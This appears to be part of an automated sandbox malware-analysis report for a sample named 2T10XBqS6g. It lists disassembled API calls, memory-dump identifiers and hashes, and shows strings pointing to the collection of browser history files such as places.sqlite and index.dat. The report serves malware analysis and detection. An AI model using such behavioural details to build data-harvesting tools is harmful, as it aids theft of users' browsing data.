                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                    • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                                                                    • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                    • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$memcmp
                                                                                                                                                                                                                                    • String ID: $$8
                                                                                                                                                                                                                                    • API String ID: 2808797137-435121686
                                                                                                                                                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75C52EE0), ref: 0040E3EC
                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1979745280-0
                                                                                                                                                                                                                                    • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1355100292-0
                                                                                                                                                                                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                                    • API String ID: 2641622041-467022611
                                                                                                                                                                                                                                    • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                                                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 839530781-0
                                                                                                                                                                                                                                    • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                                                                    • String ID: *.*$index.dat
                                                                                                                                                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1156039329-0
                                                                                                                                                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1125800050-0
                                                                                                                                                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseHandleSleep
                                                                                                                                                                                                                                    • String ID: }A
                                                                                                                                                                                                                                    • API String ID: 252777609-2138825249
                                                                                                                                                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                                                                    • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                    • API String ID: 0-2564639436
